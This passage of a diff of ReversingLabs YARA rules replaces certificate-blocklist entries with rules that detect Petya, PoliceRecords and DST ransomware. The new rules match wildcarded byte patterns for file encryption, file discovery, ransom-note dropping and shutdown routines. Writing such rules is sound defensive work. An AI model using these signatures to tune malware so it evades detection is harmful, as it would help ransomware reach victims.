?? 00 08 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE9\\x87\\x91\\xE4\\xBF\\x8A\\xE5\\x9D\\xA4\\xE8\\xAE\\xA1\\xE7\\xAE\\x97\\xE6\\x9C\\xBA\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x8D\\xE5\\x8A\\xA1\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and (pe.signatures[i].serial=="00:cc:8d:90:2d:a3:65:87:c9:b2:11:3c:d7:6c:3c:3f:8d" or pe.signatures[i].serial=="cc:8d:90:2d:a3:65:87:c9:b2:11:3c:d7:6c:3c:3f:8d") and 1292544000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) and ($remote_connection) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_328Bdcc0F679C4649147Fbb3Eb0E9Bc6 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Petya : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Petya ransomware." author = "ReversingLabs" - id = "8e2c2204-8905-5e05-9ec8-e1577ae4c2cb" - date = "2023-11-08" - modified = "2023-11-08" + id = "93d9fb33-88d1-50ec-bf99-1888201c0ec2" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2770-L2786" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6d9e1f25ca252ca9dda7714c52a2e57fd3b5dca08cd2a45c9dec18a31d3bb342" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Petya.yara#L3-L58" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d2adafcb21b627d614eab79e64e2b96ad09fae796d0670452a19490d8781ce99" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Petya" + tc_detection_factor = 5 importance = 25 + strings: + $entry_point = { + 55 8B EC 56 8B 75 ?? 57 83 FE ?? 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 8B F8 85 F6 75 ?? E8 ?? + ?? ?? ?? 8B C7 5F 5E 5D C2 + } + $shutdown_pattern = { + 55 8B EC 83 EC ?? 8D 45 ?? 56 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 + 75 ?? 33 C0 EB ?? 8D 45 ?? 33 F6 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 56 56 8D + 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 56 56 56 68 ?? ?? ?? ?? FF D0 33 C0 83 C4 ?? 40 5E 8B + E5 5D C3 + } + $sectionxxxx_pattern = { + 83 EC ?? 53 55 8B C2 89 4C 24 ?? 56 57 8B C8 89 44 24 ?? 33 D2 E8 ?? ?? ?? ?? 85 C0 + 74 ?? 0F B7 48 ?? 8B FA 83 C1 ?? 03 C8 0F B7 40 ?? 89 44 24 ?? 85 C0 74 ?? BE ?? ?? + ?? ?? 2B F1 80 39 ?? 8D 59 ?? 6A ?? 5D 75 ?? 85 ED 74 ?? 0F BE 2C 1E 0F BE 03 43 3B + E8 74 ?? 83 C1 ?? 83 EE ?? 47 3B 7C 24 ?? 72 ?? 8B CA 85 C9 74 ?? 8B 51 ?? 8B 5C 24 + ?? 8B FB 03 54 24 ?? 8B F2 8B 4A ?? A5 83 C1 ?? 03 CA 89 4B ?? A5 A5 8B 43 ?? 8D 72 + ?? 89 43 ?? 8B 43 ?? 89 43 ?? B8 ?? ?? ?? ?? 89 73 ?? 66 39 01 74 ?? 8B 7A ?? 8B 2A + 03 7A ?? 74 ?? 33 DB 43 2B DE 33 D2 8D 0C 33 8B C5 F7 F1 30 16 46 4F 75 ?? B2 ?? 5F + 5E 5D 0F B6 C2 5B 83 C4 ?? C3 + } + $crypt_gen_pattern = { + 55 8B EC 53 57 8B 7D ?? 8D 45 ?? 68 ?? ?? ?? ?? 6A ?? 33 DB 53 53 50 89 1F FF 15 ?? + ?? ?? ?? 85 C0 75 ?? 6A ?? 58 EB ?? 56 FF 75 ?? 8B 75 ?? 56 FF 75 ?? FF 15 ?? ?? ?? + ?? 85 C0 75 ?? 6A ?? 58 EB ?? 53 FF 75 ?? FF 15 ?? ?? ?? ?? 89 37 33 C0 5E 5F 5B 5D + C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Nooly Systems LTD" and pe.signatures[i].serial=="32:8b:dc:c0:f6:79:c4:64:91:47:fb:b3:eb:0e:9b:c6" and 1204847999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($entry_point at pe.entry_point) and $shutdown_pattern and $sectionxxxx_pattern and $crypt_gen_pattern } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_5F78149Eb4F75Eb17404A8143Aaeaed7 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Policerecords : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects PoliceRecords ransomware." author = "ReversingLabs" - id = "4c9d3bba-4e7f-5bf5-ab90-f2b900ec0b2a" - date = "2023-11-08" - modified = "2023-11-08" + id = "bacd3f98-a069-58ca-8423-01fcef7d4062" + date = "2022-08-02" + modified = "2022-08-02" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2788-L2804" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0c7c9e8d2a9304e0407b8a1a29977312a9ba766a4052c6b874855fa187c85585" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.PoliceRecords.yara#L1-L79" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "55cb1a5d030c47abb1a9ca9970fb19b3124128e409bc9515c173c33b2bb49a16" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "PoliceRecords" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files = { + 00 72 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 06 6F ?? ?? ?? ?? 0C 04 0D 09 18 73 ?? ?? ?? + ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 08 08 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? + 03 19 73 ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? D2 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? + 25 13 ?? 15 FE 01 16 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? + ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 2A + } + $find_files = { + 11 ?? 11 ?? 9A 13 ?? 00 00 07 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 00 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E + 69 32 ?? 00 DE ?? 26 00 00 DE ?? 17 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 0C 16 13 ?? + 2B ?? 00 00 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 11 ?? 9A 28 ?? ?? ?? ?? 00 + 72 ?? ?? ?? ?? 08 11 ?? 9A 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? + 00 11 ?? 17 58 13 ?? 11 ?? 08 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 00 72 ?? ?? ?? ?? 1D 28 + ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1D 28 ?? ?? ?? ?? 72 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 7E ?? ?? + ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ?? + ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 16 8C + ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 + ?? 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? + 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ?? + ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F + ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? + 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 00 07 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? + 13 ?? 11 ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 26 2A + } + $desktop_kill_tick = { + 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 09 72 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 13 ?? 07 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 07 28 ?? ?? ?? ?? 00 + 00 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 11 ?? 28 ?? ?? ?? ?? 00 00 02 7B ?? ?? ?? + ?? 6F ?? ?? ?? ?? 00 2A + } + $drop_ransom_note = { + 00 16 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 00 07 72 ?? + ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? + ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 + 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 DE ?? 07 2C ?? + 07 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 + ?? ?? ?? ?? 26 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE5\\x9F\\x9F\\xE8\\x81\\x94\\xE8\\xBD\\xAF\\xE4\\xBB\\xB6\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="5f:78:14:9e:b4:f7:5e:b1:74:04:a8:14:3a:ae:ae:d7" and 1303116124<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($desktop_kill_tick) and ($drop_ransom_note) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_629D120Dd84F9C1688D4Da40366Fab7A : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_DST : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects DST ransomware." author = "ReversingLabs" - id = "7e6249ba-3a4f-5096-be32-779e73c88221" - date = "2023-11-08" - modified = "2023-11-08" + id = "bcc9933d-14eb-5f83-a136-5f009c7a3282" + date = "2021-12-06" + modified = "2021-12-06" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2806-L2822" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "187f6ef0de869500526d1b0d5c6f6762b0a939e06781e633a602834687c64023" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.DST.yara#L1-L170" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b658093232a2265d425e3b38758268c116bbac51fa5eed372b5b4f00de4c6880" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Delta Controls" and pe.signatures[i].serial=="62:9d:12:0d:d8:4f:9c:16:88:d4:da:40:36:6f:ab:7a" and 1306799999<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_039E5D0E3297F574Db99E1D9503853D9 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "969ffa17-de06-58d5-a74e-c115b49a9a6c" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2824-L2840" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2f150f60b7dce583fc68705f0b29a7c8684f1b69020275b2ec1ac6beeaa63952" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "DST" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC + 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? + ?? 48 89 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 85 DB 0F 84 ?? ?? ?? ?? 48 + 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 4C 24 ?? + 31 C9 31 FF E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 DB + 0F 85 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 0D ?? ?? + ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? + ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 0F 1F 00 + E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 31 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? + ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BF ?? ?? + ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 DB 0F 85 + ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 0D + } + $encrypt_files_p2 = { + 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 8C 24 + ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 44 24 ?? E8 ?? ?? ?? ?? 90 85 C0 0F 85 ?? ?? ?? ?? + 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? + BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? + ?? 48 85 DB 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? + ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 85 C9 0F 85 ?? ?? ?? ?? + 48 89 5C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 51 ?? 48 8B 84 24 ?? ?? + ?? ?? FF D2 48 8B 0D ?? ?? ?? ?? 83 B9 ?? ?? ?? ?? ?? 75 ?? 48 89 C2 48 C1 E0 ?? 48 + 8D 70 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 D1 48 F7 EE 48 8D 14 CA 48 8D 52 ?? 48 + } + $encrypt_files_p3 = { + C1 FA ?? 48 C1 FE ?? 48 29 F2 EB ?? 48 8D 70 ?? 48 89 C1 48 B8 ?? ?? ?? ?? ?? ?? ?? + ?? 48 F7 EE 48 8D 14 0A 48 8D 52 ?? 48 D1 FA 48 C1 FE ?? 48 29 F2 48 C1 E2 ?? 48 8D + 4A ?? 48 89 4C 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 CB E8 ?? ?? ?? ?? 48 89 C3 48 8B 4C + 24 ?? 48 89 CF 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 + 8C 24 ?? ?? ?? ?? 48 85 DB 0F 85 ?? ?? ?? ?? 31 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 4C + 24 ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 D9 48 89 C3 48 8B 84 + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 + DB 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 31 FF 48 8B 74 + 24 ?? 4C 8B 84 24 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 85 DB 0F + 85 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 C3 48 8D 0D ?? ?? ?? ?? 48 8B BC 24 ?? + ?? ?? ?? 31 F6 45 31 C0 4D 89 C1 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? + ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 + ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? + ?? 31 DB 31 C9 E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 + DB 74 ?? 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC + 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 94 24 ?? ?? ?? ?? 48 8B 72 ?? 48 8B 42 + ?? 48 8B 56 ?? 31 DB 31 C9 48 89 CF FF D2 48 8B 15 ?? ?? ?? ?? 48 89 CF 48 89 D9 48 + } + $encrypt_files_p4 = { + 89 C3 48 89 D0 E8 ?? ?? ?? ?? 48 89 D9 48 89 C3 48 8B 84 24 ?? ?? ?? ?? 0F 1F 40 ?? + E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 + 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? + ?? ?? C3 90 0F 1F 40 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? + ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? + ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 + E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? + ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? + ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 + 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? + C3 90 66 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC + 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 + 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? + ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 + ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 + 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? + ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 66 90 + E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? + ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 44 24 ?? 48 89 5C 24 ?? 48 89 4C 24 ?? 48 89 7C 24 + ?? E8 + } + $find_files_p1 = { + 4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC + 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? + ?? 48 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 DB 7E ?? 48 89 5C 24 ?? 31 C9 EB ?? + 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 9C 24 ?? ?? ?? ?? 48 8D 43 ?? + 48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 10 48 89 54 24 ?? 48 8B 58 ?? 48 89 5C + 24 ?? 48 8B 72 ?? 48 89 D8 FF D6 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 + 8B 8C 24 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 49 89 C0 49 89 D9 31 C0 48 + 8B 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? 48 8B 4C 24 ?? 48 + 8B 51 ?? 48 8B 44 24 ?? FF D2 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D + 4B ?? 66 90 E9 ?? ?? ?? ?? 48 29 CB 48 89 DA 48 F7 DB 48 C1 FB ?? 48 21 D9 48 01 C1 + 48 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? EB ?? 31 D2 31 C9 48 89 C8 48 89 D3 + E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? + 48 8B 3D ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 66 90 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8D BC + 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 48 89 6C 24 ?? 48 8D 6C + } + $find_files_p2 = { + 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 48 8D 84 24 ?? ?? ?? ?? 31 C9 0F 1F 00 E9 ?? ?? ?? + ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 44 24 ?? FF D1 84 C0 74 ?? 48 8B 44 24 ?? 48 8B + 5C 24 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 8B 54 24 + ?? 0F 1F 00 48 39 CA 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 FF C9 48 85 C9 0F 8C ?? ?? + ?? ?? 0F B6 14 08 66 90 80 FA ?? 0F 84 ?? ?? ?? ?? 80 FA ?? 0F 84 ?? ?? ?? ?? 80 FA + ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 42 ?? 48 89 4C 24 ?? 48 89 84 + 24 ?? ?? ?? ?? 48 8B 10 48 89 54 24 ?? 48 8B 70 ?? 48 89 74 24 ?? 48 8B 5C 24 ?? 48 + 8B 44 24 ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B 44 + 24 ?? 48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? + 48 89 DF 48 89 D3 48 89 C2 48 89 C8 48 89 D1 E8 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? + 48 85 C0 0F 8D ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 83 F9 ?? 0F 8C ?? ?? ?? ?? 48 + 8B 4C 